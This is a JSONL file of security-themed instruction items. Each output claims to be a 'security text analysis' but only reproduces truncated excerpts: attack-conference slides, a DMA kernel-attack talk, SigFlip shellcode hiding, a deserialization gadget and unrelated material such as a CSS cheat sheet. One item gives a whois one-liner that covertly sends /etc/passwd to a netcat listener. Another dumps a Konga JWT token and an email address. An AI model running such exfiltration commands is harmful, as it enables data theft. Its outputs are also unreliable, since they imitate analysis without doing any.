{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOne Token to Rule Them All: Post-Exploitation Fun in Windows Environments 06 July 2007 2 Introduction The Increasing Importance of Post-Exploitation  Microsoft Technology is Pervasive  Security has improved significantly since their Trustworthy Computing Initiative  Consequently, Post-Exploitation has become increasingly important 3 Introduction The Potential for Token Abuse for Post-Exploitation  This has been addressed to some extent. Metasploit is a good example  From a penetration testers perspective, not much has been done with windows access tokens  They are integral to Microsoft's whole concept of single sign-on within an active directory environment  Difficult to convince clients of the importance of keeping their administrators' desktops as secure as their servers etc 4 Windows Access Tokens: An Overview  Not well understood  Processes have a primary token associated which dictates their privileges  Threads by default use this but can impersonate other users temporarily through impersonation tokens  Tokens have four different security levels (delegation most interesting) : - o Anonymous o Identification o Impersonation o Delegation  Interactive logons result in delegation level tokens being created  Non-interactive logons normally result in impersonation level tokens, but can produce delegation tokens if a service is trusted for delegation e.g. EFS file server 5 Token Abuse  Tokens may be present on compromised systems that allow privilege escalation of some sort  Domain Privilege Escalation o If domain user tokens are available then other systems may be accessible using these o e.g. compromising a DBA's workstation might allow his token to be used to gain access to sensitive database servers that are secure from direct compromise  Local Privilege Escalation o Under some circumstances, presence of impersonation level tokens may allow local privilege escalation o compromising an SQL Server instance running as an unprivileged service account. If an administra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDirect Memory Attack the KERNEL by: ULF FRISK Rise of the Machines: Agenda PWN LINUX, WINDOWS and OS X kernels by DMA code injection DUMP memory at >150MB/s PULL and PUSH files EXECUTE code OPEN SOURCE project USING a $100 PCIe-card About Me: Ulf Frisk Penetration tester Online banking security Employed in the financial sector  Stockholm, Sweden MSc, Computer Science and Engineering Special interest in Low-Level Windows programming and DMA Learning by doing project  x64 asm and OS kernels Disclaimer This talk is given by me as an individual My employer is not involved in any way PCILeech PCILeech == PLX USB3380 DEV BOARD + FIRMWARE + SOFTWARE PCIe USB3 $78 No Drivers Required >150MB/s DMA 32-bit (<4GB) DMA only SLOTSCREAMER PRESENTED by Joe Fitzpatrick, Miles Crabill @ DEF CON 2yrs ago PCILeech compared to SLOTSCREAMER SAME HARDWARE DIFFERENT FIRMWARE and SOFTWARE FASTER 3MB/s >150MB/s KERNEL IMPLANTS PCI Express  PCIe is a high-speed serial expansion bus  Packet based, point-to-point communication  From 1 to 16 serial lanes  x1, x4, x8, x16  Hot pluggable  Different form factors and variations  PCIe  Mini  PCIe (mPCIe)  Express Card  Thunderbolt  DMA capable, circumventing the CPU DMA  Direct Memory Access Code executes in virtual address space PCIe DMA works with physical (device) addresses PCIe devices can access memory directly if the IOMMU is not used VT-d enabled No VT-d (normal) Firmware  46 bytes - This is the entire firmware !!!  5a00 = HEADER, 2a00 = LENGTH (little endian)  2310 4970 0000 = USBCTL register  0000 e414 bc16 = PCI VENDOR_ID and PRODUCT_ID (Broadcom SD-card)  C810  0400 = DMA ENDPOINTS  GPEP0 (WRITE), GPEP1-3 (READ)  2110 d118 0190 = USB VENDOR_ID and PRODUCT_ID (18D1, 9001 = Google Glass) Into the KERNELS Most computers have more than 4GB memory! Kernel Module (KMD) can access all memory KMD can execute code Search for code signature using DMA and patch code Hijack execution flow of kernel code PCIe DMA works with physical addresses Kernel co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH SAMBA 7 \"26 Apr 2000\" \"samba 2.0.7\" .PP .SH NAME samba - 为 UNIX 实现的 Windows SMB/CIFS 文件服务器 .PP .SH \"SYNOPSIS 总览\" \\fBSamba\\fP .PP .SH \"DESCRIPTION 描述\" .PP samba 套件是在 UNIX 系统上实现服务器信息块(通常简称 SMB) 协议的一组程序这个协议有时也称为通用互联网文件系统 LanManager 或 NetBIOS 协议 .PP .SH \"COMPONENTS 组件\" .PP samba 由几个部件组成每个部件在一系列的文档中被描述 强烈推荐你阅读这些 samba 本身和你用的那些部件的手册中的文档 如果手册不够清晰请向这个地址发送补丁或者错误报告samba-bugs@samba.org .PP .IP .IP \"\\fBsmbd\\fP\" .br .br \\fBsmbd\\fP (8) 守护程序为 SMB 客户例如 Windows 95/98Windows NT Windows for Workgroups 或者是 LanManager 提供文件和打印服务 它的相应配置文件在 \\fBsmb\\&.conf (5)\\fP 中描述 .IP .IP \"\\fBnmbd\\fP\" .br .br \\fBnmbd\\fP (8) 守护程序提供 NetBIOS 名字服务和浏览支持它的相应配置文件在 \\fBsmb\\&.conf (5)\\fP 中描述 .IP .IP \"\\fBsmbclient\\fP\" .br .br \\fBsmbclient\\fP (1) 程序实现了一种简单的类似 FTP 的客户端应用 对于访问位于其它兼容服务器(如 NT)上的 SMB 共享资源非常有用 同时它也可用于 UNIX 机器向任何 SMB 服务器(如运行 NT 的 PC 机)上的打印机 提交打印作业 .IP .IP \"\\fBtestparm\\fP\" .br .br \\fBtestparm (1)\\fP 工具让你可以测试你的 \\fBsmb\\&.conf (5)\\fP 配置文件 .IP .IP \"\\fBtestprns\\fP\" .br .br \\fBtestprns (1)\\fP 工具可以测试你在 printcap 文件中定义好的打印机 .IP .IP \"\\fBsmbstatus\\fP\" .br .br The \\fBsmbstatus\\fP (1) 工具用来列出当前在 \\fBsmbd (8)\\fP 服务器上的联接 .IP .IP \"\\fBnmblookup\\fP\" .br .br the \\fBnmblookup (1)\\fP 工具用来向 UNIX 机器查询 NetBIOS 名字 .IP .IP \"\\fBmake_smbcodepage\\fP\" .br .br \\fBmake_smbcodepage (1)\\fP 工具用来为你的 \\fBsmbd (8)\\fP 服务器建立 SMB 代码页定义文件 .IP .IP \"\\fBsmbpasswd\\fP\" .br .br \\fBsmbpasswd (8)\\fP 工具用来在 samba 和 NT 服务器上改变 SMB 加密口令 .IP .PP .SH \"AVAILABILITY\" 可用性 .PP samba 套件由 GNU 公共协议保护在软件包的 COPYING 文件中 包含了一份协议的复本你可以散布套件的拷贝但请服从协议条款 .PP samba 套件的最新版本可以通过位于 samba.org 的匿名 FTP 上的 目录获得当然也可以在很多互联网上的镜像站点中获得 .PP 你也能在 comp.protocols.smb 新闻组和 samba 的邮件列表 上找到相关的有用信息在 samba 的 README 文件中给出了 加入邮件列表的详细资料 .PP 如何你能用 WWW 浏览器的话在 http://samba.org/samba/ 将会找到包括 samba 邮件列表的问题在内的非常多的有用信息 .PP .SH \"VERSION\" 版本 .PP 这份手册是针对 samba 套件版本 2.0 的 .PP .SH \"CONTRIBUTIONS\" 投稿 .PP 如果你想向 samba 计划投稿的话建议你到 samba@samba.org 加入 samba 的邮件列表详细介绍请看在 http://samba.org/listproc 的网页 .PP 如果你一个补丁需要提交或者要报告一个错误的话可以直接向 samba-bugs@samba.org 发信注意samba 开发组可以会因为 这个软件包的迅速流行而需要花费一定的时间来对邮件作出回应 我们更愿意在 \\fIdiff -u\\fP 格式", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON 17 July 31, 2009 R.W. Clark  United States v. Prochner, 417 F.3d 54 (D. Mass. July 22, 2005)  Definition of Special Skills  Special skill - a skill not possessed by members of the general public and usually requiring substantial education, training or licensing.  Examples - pilots, lawyers, doctors, accountants, chemists, and demolition experts  Not necessarily have formal education or training  Acquired through experience or self-tutelage  Critical question is - whether the skill set elevates to a level of knowledge and proficiency that eclipses that possessed by the general public. Court Recognizes Your Special Skills  Feds won't deem proxies 'sophisticated'  US government has dropped --for now--a plan to classify the use of \"proxy servers as evidence of sophistication in committing a crime.  US Sentencing Commission was considering a change to federal sentencing guidelines that would have increased sentences by about 25 percent for people convicted of crimes in which proxies are used to hide the perpetrators' tracks.  Digital-rights advocates complained language too broad  Commission struck the controversial language from the amendments  Justice Department supported the proposed amendment as a way to hand down stiffer sentences for people who set up elaborate proxy networks--sometimes in multiple countries --to commit crimes and hide their identities.  Digital-rights advocates said the amendment would have sent a chilling message about using a common technology that is often encouraged as a safer way of using the Internet. Fortunately US Sentencing Commission will not recognizes your special skills Agenda  Encrypted Hard Drive  Scope of Consent & Investigation  Untimely Search after Seizure  Consent/Destruction of Evidence/Revoke consent to search computer  Border Search of PC Away from Border  FTC and Cyberspy Software  Installing viruses and key stroke logger  Responsible Disclosure  Cyberwarfare and Definitions  What Makes a Hacker  2 operating systems ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 协议分析概述 网络协议为计算机网络中进行数据交换而建立的规则标准或约定的集合例如网络中一个微机用户和一个大型主机的操作员进行通信由于这两个数据终端所用字符集不同因此操作员所输入的命令彼此不认识为了能进行通信规定每个终端都要将各自字符集中的字符先变换为标准字符集的字符后才进入网络传送到达目的终端之后再变换为该终端字符集的字符当然对于不相容终端除了需变换字符集字符外还需转换其他特性如显示格式行长行数屏幕滚动方式等也需作相应的变换 相应的我们在协议分析这一章节中将会从以下几个方面来介绍这一部分的知识 - `Wireshark` 常用功能的介绍 - `HTTP` 协议分析 - `HTTPS` 协议分析 - `FTP` 协议分析 - `DNS` 协议分析 - `WIFI` 协议分析 - `USB` 协议分析", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n利用whois传输文件 传输机 ```bash root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64` ``` 接受机 ```bash root@john:/tmp# nc -l -v -p 4444 | sed \"s/ //g\" | base64 -d ``` ![](media/cd6ba6694ef1388b87dc4a5ce706ecd8.jpg) ![](media/2ee55e5bed9e117f9340df1f2e755410.jpg) **优点**适用于隐蔽传输最小化被发现 **缺点**适用于传输小文件 > 后者的话whois是否同样适用于payload的反弹是一个非常有趣的实验 > > Micropoor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPortBunny A kernel-based port-scanner Copyright  2007 Recurity Labs GmbH Copyright  2007 Recurity Labs GmbH Copyright  2007 Recurity Labs GmbH Copyright  2007 Recurity Labs GmbH A Port Scanner? *Yawn* Port scanning is fun for most people Needs random scanning Needs 1337 output Needs 23 different scanning types Port scanning is work for some people Needs Accuracy Needs Speed Speed Time Money Will use dedicated machines Why not nmap? 3 * 255 Hosts in 30 days with nmap Im actually coming of age Your scanner is not 1337 if it takes 13:37 per host! No, --disable-waiting-for-things-that-dont-happen doesnt cut it Professionals dont scan hosts that are   powered off  disassembled  currently being carried around in the office Large scale network scanning is application stocktaking, not vulnerability identification Little interest in the one fully filtered host with only port 23420 open Much interest in how many systems in five Class B networks have port 12345 open And on a more abstract level All discovery methods depend on a single set of information: the list of open, closed and filtered TCP ports OS Fingerprinting Service probing Banner grabbing Accordingly, we need this list first, and quickly at that Our Requirements TCP SYN Scanning only, no XMAS trees No UDP Scanning UDP scanning is a negative scan method Information value of a UDP scan of a properly firewalled host with UDP services is exactly zero Constant access to result data Offloading fingerprinting tasks right when results become available Design for embedded use Engine design with variable front ends Bottom line: Do just one thing, but do it right. PortBunny Portbunny scans faster by sending more Portbunny builds a bridge between TCP congestion control and port-scanning. Portbunny shows that vanilla TCP-SYN port- scans already leave you with lots of room for research. 1. Port-Scanning - Basics 21 CLOSED 22 OPEN 23 FILTERED RST-ACK SYN SYN SYN-ACK SYN Identify open, closed and filtered ports by sending connecti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: '3' services: web: image: vulhub/geoserver:2.22.1 depends_on: - postgres ports: - \"8080:8080\" volumes: - ./startup.sh:/startup.sh command: bash /startup.sh postgres: image: postgis/postgis:14-3.3-alpine environment: - POSTGRES_PASSWORD=vulhub - POSTGRES_DB=geoserver", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCommonCollection1 InvokeTransformer // // Source code recreated from a .class file by IntelliJ IDEA // (powered by FernFlower decompiler) // package ; import Serializable; import InvocationTargetException; import Method; import FunctorException; import Transformer; public class InvokerTransformer implements Transformer, Serializable { static final long serialVersionUID = -8653385846894047688L; private final String iMethodName; private final Class[] iParamTypes; private final Object[] iArgs; public static Transformer getInstance(String methodName) { if (methodName == null) { throw new IllegalArgumentException(\"The method to invoke must not be null\"); } else { return new InvokerTransformer(methodName); } } public static Transformer getInstance(String methodName, Class[] paramTypes, Object[] a rgs) { if (methodName == null) { throw new IllegalArgumentException(\"The method to invoke must not be null\"); } else if (paramTypes == null && args != null || paramTypes != null && args == null || paramTypes != null && args != null && paramTypes.length != args.length) { throw new IllegalArgumentException(\"The parameter types must match the argument s\"); } else if (paramTypes != null && paramTypes.length != 0) { paramTypes = (Class[])paramTypes.clone(); args = (Object[])args.clone(); return new InvokerTransformer(methodName, paramTypes, args); } else { return new InvokerTransformer(methodName); } } private InvokerTransformer(String methodName) { this.iMethodName = methodName; this.iParamTypes = null; this.iArgs = null; org.apache.commons.collections.functors java.io. java.lang.reflect. java.lang.reflect. org.apache.commons.collections. org.apache.commons.collections. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 这是一个单例模式设计的类通过transform方法使用反射执行代码传入参数为一个对象 } public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { this.iMethodName = methodName; this.iParamTypes = paramTypes; this", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n听说你在SigFlip在PE签名嵌 shellcode -- 副标题: 检测SigFlip在PE的签名嵌的shellcode以及嵌法改进 # 前 之前看到 @w8ay 实现的加成器就感觉这个做法常的棒但是 SigFlip 的做法 真的隐蔽吗真的不容易被查杀吗 刚好最近在研究PE的件签名结构和签名那今天就详细讲解下签名相关的内容以及如 何改进 SigFlip 实现更深层次的隐藏 # 原理回顾 对原理较了解的直接跳过这节 看下微软给的PE件的签名的结构这张图常的经典但是这只是个微软签名省略 了部分细节的概括图但是有助于我们了解些最基本的信息 先可以看到图中灰区域标注的内容是不参与件签名hash计算的并且可以看 到 Attribute Certificate table 的位置是由 PE头中的 Data Directories 中某项指 定的 Data Directories 共有16项每项的结构都是 总共8个字节指定了对应的数据在件中的偏移以及 Data Directories 的Security 项就指向了其签名数据 签名数据的数据结构是 dwLength 表明签名的数据的总体般是等于 _IMAGE_DATA_DIRECTORY 的size 字段 wRevision表明当前签名信息的版本 wCertificateType指定接下来的签名的类型 bCertificateByte数组存储的就是签名的具体数据 最值得注意的是 bCertificate 的字节要求8字节对齐 SigFlip的代码实现 从上分析的不参与件校验的部分可以得知只有 _WIN_CERTIFICATE 部分是可以来隐 藏数据的具体我们直接看SigFlip的代码实现 typedef struct _IMAGE_DATA_DIRECTORY { DWORD VirtualAddress; DWORD Size; } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; 1 2 3 4 typedef struct _WIN_CERTIFICATE { DWORD dwLength; WORD wRevision; WORD wCertificateType; // WIN_CERT_TYPE_xxx BYTE bCertificate[ANYSIZE_ARRAY]; } WIN_CERTIFICATE, *LPWIN_CERTIFICATE; 1 2 3 4 5 6 先获取到 _WIN_CERTIFICATE 的位置和然后把数据padding到签名中并扩充为8字 节对齐最后更新PE件的checksum和 _WIN_CERTIFICATE 的 # 检测法 SigFlip 的检测是常简单我们抛开插shellcode时的标识起始 字 \\xFE\\xED\\xFA\\xCE\\xFE\\xED\\xFA\\xCE 不谈只看插的内容可以看到 SigFlip 仅 仅修改了 _IMAGE_DATA_DIRECTORY 中的 Size 字段但是并没有修改 _WIN_CERTIFICATE 中的 dwLength ,两个长度不致就可以很轻易的发现隐藏在签名中的数据 //Get IMAGE_DIRECTORY_ENTRY_SECURITY field and retrieve the RVA and SIZE of the Certificate Table (WIN_CERTIFICATE). _CertTableRVA = _optHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY + _DT_SecEntry_Offset].VirtualAddress; _CertTableSize = _optHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY + _DT_SecEntry_Offset].Size; _wCert = (LPWIN_CERTIFICATE)((BYTE*)_peBlob + _CertTableRVA); 1 2 3 4 memcpy((((BYTE*)_peBlob + _CertTableRVA) + _wCert->dwLength), _rpadding, strlen(_rpadding)); //update dwLength and Cert Table Entry Size. printf(\"[+]:Updating OPT Header Fields/Entries \\n\"); _wCert->dwLength += strlen(_rpadding); _ntHeader- >OptionalHeader.Data", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBetrayed by the keyboard How what you type can give you away Matt Wixey Research Lead, PwC UK Cyber Security www.pwc.com Building a secure digital society. PwC  2 Disclaimer  The views and opinions expressed here are not necessarily those of PwC  This content is presented for educational purposes only  What this presentation isnt PwC  3 Introduction Matt Wixey  Research Lead for the Cyber Security BU  Work on the Ethical Hacking team  PhD student at UCL  Previously worked in LEA doing technical R&D PwC  4 Why this talk?  Based on some research I did at UCL  Interest in side-channel attacks  Humans have side-channels too  Previous work on forensic linguistics  First degree = English Literature and Language PwC  5 Agenda  What is attribution?  Problems  Case Linkage Analysis  Experimentation  Results  Implications  Summary PwC  6 What is attribution?  Why would we want to do it?  Benefits  Types  Approaches PwC  7 What is attribution?  Identifying an attackers location?  Hunker et al, 2008; Wheeler and Larsen, 2003  Identify the country or organisation behind an attack?  Rid and Buchanan, 2014  Determining who is responsible for a hostile cyber act?  Mejia, 2014  We must find a person, not a machine  Clark and Landau, 2011 PwC  8 Benefits of attribution  Deterring future attacks  Improving defences  Interrupting and disrupting attacks (Hunker et al, 2008)  Does attribution actually lead to deterrence? (Guitton, 2012)  Regardless, attribution is a desirable outcome (depending on which side youre on!) PwC  9 Types of attribution  Hutchins et al, 2011: Atomic Computed Behavioural PwC  10 Problems with attribution  Hiding atomic IOCs  Issues with computed IOCs  Lack of tangible benefits from behavioural IOCs PwC  11 Hiding atomic IOCs  These are the most effective identifiers  Easy to resolve (usually)  But also easiest to spoof/anonymise/obfuscate PwC  12 Issues with computed IOCs  Changes to malware make it harder  Other methods:  Correlating activity with office hours ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## A numbers game (PPC, 50p) Description: People either love or hate math. Do you love it? Prove it! You just need to solve a bunch of equations without a mistake. ###ENG [PL](#pl-version) Server sends input in format: Hi, I heard that you're good in math. Prove it! Level 1.: x - 18 = -12 And we are supposed to send the solution to the equation. So for the example above we parse `-` as operation, `18` as operand and `-12` as result, and thus the solution is `-12 + 18`. We automate is wih a simple script that parses operation, operand and result and then applies corresponding operation (eg. + for -). ```python import re import socket from time import sleep def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((\"188.166.133.53\", 11027)) regex = \"Level \\d+\\.: x (.) (\\d+) = (.+)\" initial_data = str(s.recv(4096)) print(initial_data) while True: sleep(1) task = str(s.recv(4096)) m = re.search(regex, task) print(task) operation = m.group(1) operand = int(m.group(2)) result = int(m.group(3)) x = result if operation == \"+\": x = result - operand elif operation == \"-\": x = result + operand elif operation == \"*\": x = result / operand elif operation == \"/\": x = result * operand s.sendall(str(x) + \"\\n\") pass main() ``` After 100 examples we get a flag: `IW{M4TH_1S_34SY}` ###PL version Serwer dostarcza dane w formacie: Hi, I heard that you're good in math. Prove it! Level 1.: x - 18 = -12 A naszym zadaniem jest rozwiązać podane równanie. Dla przykładu powyżej parsujemy `-` jako operacje, `18` jako operand oraz `-12` jako wynik, więc rozwiązaniem jest `-12 + 18`. Automatyzujemy to skryptem który parsuje operacje, operand oraz wynik a nastepnie wykorzystuje operacje przeciwną (np. + dla -). ```python import re import socket from time import sleep def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((\"188.166.133.53\", 11027)) regex = \"Level \\d+\\.: x (.) (\\d+) = (.+)\" initial_data = str(s.recv(4096)) print(initial_data) while True: sleep(1)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: CSS 3 date: 2020-12-25 20:22:47 background: bg-[#3473b5] tags: - web - css - style categories: - Programming intro: | This is a quick reference cheat sheet for CSS goodness, listing selector syntax, properties, units and other useful bits of information. plugins: - copyCode --- Getting Started ------------ ### Introduction {.row-span-3} CSS is rich in capabilities and is more than simply laying out pages. #### External stylesheet ```html {.wrap} <link href=\"./path/to/stylesheet/style.css\" rel=\"stylesheet\" type=\"text/css\"> ``` #### Internal stylesheet ```html <style> body { background-color: linen; } </style> ``` #### Inline styles ```html {.wrap} <h2 style=\"text-align: center;\">Centered text</h2> <p style=\"color: blue; font-size: 18px;\">Blue, 18-point text</p> ``` ### Add class ```html <div class=\"classname\"></div> <div class=\"class1 ... classn\"></div> ``` Support multiple classes on one element. ### !important ```css .post-title { color: blue !important; } ``` Overrides all previous styling rules. ### Selector ```css h1 { } #job-title { } div.hero { } div > p { } ``` See: [Selectors](#css-selectors) ### Text color ```css color: #2a2aff; color: green; color: rgb(34, 12, 64, 0.6); color: hsla(30 100% 50% / 0.6); ``` See: [Colors](#css-colors) ### Background ```css background-color: blue; background-image: url(\"nyan-cat.gif\"); background-image: url(\"../image.png\"); ``` See: [Backgrounds](#css-backgrounds) ### Font ```css .page-title { font-weight: bold; font-size: 30px; font-family: \"Courier New\"; } ``` See: [Fonts](#css-fonts) ### Position ```css .box { position: relative; top: 20px; left: 20px; } ``` See also: [Position](https://learn-the-web.algonquindesign.ca/topics/css-layout-cheat-sheet/) ### Animation ```css animation: 300ms linear 0s infinite; animation: bounce 300ms linear infinite; ``` See: [Animation](#css-animation) ### Comment ```css /* This is a single line comment */ /* This is a multi-line comment */ ``` ### Flex layout ```css div { display:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntomcat整体架构和处理请求的流程 tomcat源码调试 以 tomcat8.5.68 为例 首先下载tomcat源代码tomcat8 创建资源文件目录在任意文件夹下可以创建一个文件夹用于存放配置文件站点信息等我创 建的 catalina_home 新建pom.xml使用maven管理项目导入调试所需要的依赖包 <?xml version=\"1.0\" encoding=\"UTF-8\"?> <project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"> <modelVersion>4.0.0</modelVersion> <groupId>org.apache.tomcat</groupId> <artifactId>Tomcat8.5.38</artifactId> <name>Tomcat8.5.38</name> <version>8.5</version> <properties> <java.version>1.8</java.version> </properties> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.12</version> <scope>test</scope> </dependency> <dependency> <groupId>org.easymock</groupId> <artifactId>easymock</artifactId> <version>3.5.1</version> <scope>test</scope> </dependency> <dependency> <groupId>ant</groupId> <artifactId>ant</artifactId> <version>1.7.0</version> </dependency> <dependency> <groupId>ant</groupId> <artifactId>ant-apache-log4j</artifactId> <version>1.6.5</version> </dependency> <dependency> <groupId>ant</groupId> <artifactId>ant-commons-logging</artifactId> <version>1.6.5</version> </dependency> <dependency> <groupId>wsdl4j</groupId> <artifactId>wsdl4j</artifactId> <version>1.6.2</version> </dependency> <dependency> <groupId>javax.xml.rpc</groupId> <artifactId>javax.xml.rpc-api</artifactId> <version>1.1</version> </dependency> <dependency> <groupId>org.eclipse.jdt.core.compiler</groupId> <artifactId>ecj</artifactId> <version>4.6.1</version> </dependency> </dependencies> <build> <finalName>Tomcat8.5</finalName> <sourceDirectory>java</sourceDirectory> <resources> <resource> <directory>java</directory> </resource> </resources> <plugins> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <version>3.5</version> <configuration> <encoding>UTF-8</encoding> 使用IDEA导入项目 <source>${java.version}</source>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nkonga {\"user\":{\"createdUser\":null,\"updatedUser\":1,\"node\":{\"id\":6,\"name\":\"kong\",\"type\":\"default\",\"kong_admin_url\":\"http://172.30.0.3:800 1\",\"netdata_url\":null,\"kong_api_key\":\"\",\"jwt_algorithm\":\"HS256\",\"jwt_key\":null,\"jwt_secret\":null,\"username\":\"\",\"password\":\"\",\"kon g_version\":\"2.5.0\",\"health_checks\":false,\"health_check_details\":null,\"active\":false,\"createdAt\":\"2021-07-16T03:26:11.000Z\",\"updat edAt\":\"2021-07-16T03:26:11.000Z\",\"createdUser\":1,\"updatedUser\":1},\"id\":1,\"username\":\"admin\",\"email\":\"yuligesec@gmail.com\",\"firstN ame\":null,\"lastName\":null,\"admin\":true,\"node_id\":\"\",\"active\":true,\"activationToken\":\"7c15366f-2f45-4d2d-93ed-ad57b03e09ba\",\"creat edAt\":\"2021-07-16T03:21:14.000Z\",\"updatedAt\":\"2021-07-16T03:26:11.000Z\"},\"token\":\"eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3 s4VaopLDCcf4nZvH6DQo\"} eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo {\"user\":{\"createdUser\":null,\"updatedUser\":1,\"node\":{\"id\":1,\"name\":\"1\",\"type\":\"default\",\"kong_admin_url\":\"1\",\"netdata_url\":null,\"k ong_api_key\":\"\",\"jwt_algorithm\":\"HS256\",\"jwt_key\":null,\"jwt_secret\":null,\"username\":\"\",\"password\":\"\",\"kong_version\":\"2.5.0\",\"heal th_checks\":false,\"health_check_details\":null,\"active\":false,\"createdAt\":\"1\",\"updatedAt\":\"1\",\"createdUser\":1,\"updatedUser\":1},\"id\" :1,\"username\":\"1\",\"email\":\"y1@qq.com\",\"firstName\":null,\"lastName\":null,\"admin\":true,\"node_id\":\"\",\"active\":true,\"activationToken\": \"1\",\"createdAt\":\"1\",\"updatedAt\":\"1\"},\"token\":\"eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo\"}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n网络产品安全漏洞管理规定 第一条 为了规范网络产品安全漏洞发现报告修补和发布等行为防范网络安全风险根据中华人 民共和国网络安全法制定本规定 第二条 中华人民共和国境内的网络产品含硬件软件提供者和网络运营者以及从事网络产品安全 漏洞发现收集发布等活动的组织或者个人应当遵守本规定 第三条 国家互联网信息办公室负责统筹协调网络产品安全漏洞管理工作工业和信息化部负责网络产品 安全漏洞综合管理承担电信和互联网行业网络产品安全漏洞监督管理公安部负责网络产品安全漏洞 监督管理依法打击利用网络产品安全漏洞实施的违法犯罪活动 有关主管部门加强跨部门协同配合实现网络产品安全漏洞信息实时共享对重大网络产品安全漏洞风 险开展联合评估和处置 第四条 任何组织或者个人不得利用网络产品安全漏洞从事危害网络安全的活动不得非法收集出售 发布网络产品安全漏洞信息明知他人利用网络产品安全漏洞从事危害网络安全的活动的不得为其提 供技术支持广告推广支付结算等帮助 第五条 网络产品提供者网络运营者和网络产品安全漏洞收集平台应当建立健全网络产品安全漏洞信息 接收渠道并保持畅通留存网络产品安全漏洞信息接收日志不少于6个月 第六条 鼓励相关组织和个人向网络产品提供者通报其产品存在的安全漏洞 第七条 网络产品提供者应当履行下列网络产品安全漏洞管理义务确保其产品安全漏洞得到及时修补和 合理发布并指导支持产品用户采取防范措施 一发现或者获知所提供网络产品存在安全漏洞后应当立即采取措施并组织对安全漏洞进行验证 评估安全漏洞的危害程度和影响范围对属于其上游产品或者组件存在的安全漏洞应当立即通知相关 产品提供者 二应当在2日内向工业和信息化部网络安全威胁和漏洞信息共享平台报送相关漏洞信息报送内容应 当包括存在网络产品安全漏洞的产品名称型号版本以及漏洞的技术特点危害和影响范围等 三应当及时组织对网络产品安全漏洞进行修补对于需要产品用户含下游厂商采取软件固件 升级等措施的应当及时将网络产品安全漏洞风险及修补方式告知可能受影响的产品用户并提供必要 的技术支持 工业和信息化部网络安全威胁和漏洞信息共享平台同步向国家网络与信息安全信息通报中心国家计算 机网络应急技术处理协调中心通报相关漏洞信息 鼓励网络产品提供者建立所提供网络产品安全漏洞奖励机制对发现并通报所提供网络产品安全漏洞的 组织或者个人给予奖励 第八条 网络运营者发现或者获知其网络信息系统及其设备存在安全漏洞后应当立即采取措施及时 对安全漏洞进行验证并完成修补 第九条 从事网络产品安全漏洞发现收集的组织或者个人通过网络平台媒体会议竞赛等方式向社 会发布网络产品安全漏洞信息的应当遵循必要真实客观以及有利于防范网络安全风险的原则并 遵守以下规定 一不得在网络产品提供者提供网络产品安全漏洞修补措施之前发布漏洞信息认为有必要提前发布 的应当与相关网络产品提供者共同评估协商并向工业和信息化部公安部报告由工业和信息化 部公安部组织评估后进行发布 二不得发布网络运营者在用的网络信息系统及其设备存在安全漏洞的细节情况 Author: L.N. / Date: 2021-08-30 Produced by AttackTeamFamily No. 1 / 2 - Welcome to www.red-team.cn 三不得刻意夸大网络产品安全漏洞的危害和风险不得利用网络产品安全漏洞信息实施恶意炒作或 者进行诈骗敲诈勒索等违法犯罪活动 四不得发布或者提供专门用于利用网络产品安全漏洞从事危害网络安全活动的程序和工具 五在发布网络产品安全漏洞时应当同步发布修补或者防范措施 六在国家举办重大活动期间未经公安部同意不得擅自发布网络产品安全漏洞信息 